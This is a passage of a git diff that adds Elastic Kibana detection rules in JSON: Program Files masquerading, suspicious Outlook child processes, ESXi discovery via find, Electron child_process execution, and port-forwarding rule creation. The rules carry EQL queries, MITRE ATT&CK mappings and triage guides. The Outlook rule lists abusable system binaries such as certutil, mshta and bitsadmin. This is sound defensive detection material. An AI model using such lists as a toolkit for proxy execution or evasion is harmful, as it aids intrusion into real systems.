\"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?FilesOpera*\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?Files?(x86)Opera*\\\\*.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109.json new file mode 100644 index 00000000000..544cce2d17a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from a directory masquerading as the Windows Program Files directories. These paths are trusted and usually host trusted third party programs. An adversary may leverage masquerading, along with low privileges to bypass detections allowlisting those folders.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Program Files Directory Masquerading", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Downloaded Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?FilesOpera*\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?Files?(x86)Opera*\\\\*.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_110.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_110.json new file mode 100644 index 00000000000..0602d66ad23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_110.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Outlook Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Outlook Child Process\n\nMicrosoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is widely used, either standalone or as part of the Office suite.\n\nThis rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious documents and/or exploitation for initial access.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently opened files received via email and opened by the user that could cause this behavior. Common locations include but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"outlook.exe\" and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\",\n \"cdb.exe\", \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\",\n \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\",\n \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\",\n \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "32f4675e-6c49-4ace-80f9-97c9259dca2e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_111.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_111.json new file mode 100644 index 00000000000..f7f2b74e3d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_111.json @@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Outlook Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Outlook Child Process\n\nMicrosoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is widely used, either standalone or as part of the Office suite.\n\nThis rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious documents and/or exploitation for initial access.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently opened files received via email and opened by the user that could cause this behavior. Common locations include but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"outlook.exe\" and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\",\n \"cdb.exe\", \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\",\n \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\",\n \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\",\n \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "32f4675e-6c49-4ace-80f9-97c9259dca2e_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_6.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_6.json new file mode 100644 index 00000000000..df44692e38f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_6.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Discovery via Find", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"find\" and process.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "33a6752b-da5e-45f8-b13a-5f094c09522f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "33a6752b-da5e-45f8-b13a-5f094c09522f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_106.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_106.json new file mode 100644 index 00000000000..968c18926c5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_106.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to execute a child process from within the context of an Electron application using the child_process Node.js module. Adversaries may abuse this technique to inherit permissions from parent processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Execution via Electron Child Process Node.js Module", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and process.args:(\"-e\" and const*require*child_process*)\n", + "references": [ + "https://www.matthewslipper.com/2019/09/22/everything-you-wanted-electron-child-process.html", + "https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/", + "https://nodejs.org/api/child_process.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "35330ba2-c859-4c98-8b7f-c19159ea0e58", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "35330ba2-c859-4c98-8b7f-c19159ea0e58_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109.json new file mode 100644 index 00000000000..29ab1f01a2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Port Forwarding Rule Addition", + "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to any other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box to access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred, and inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to 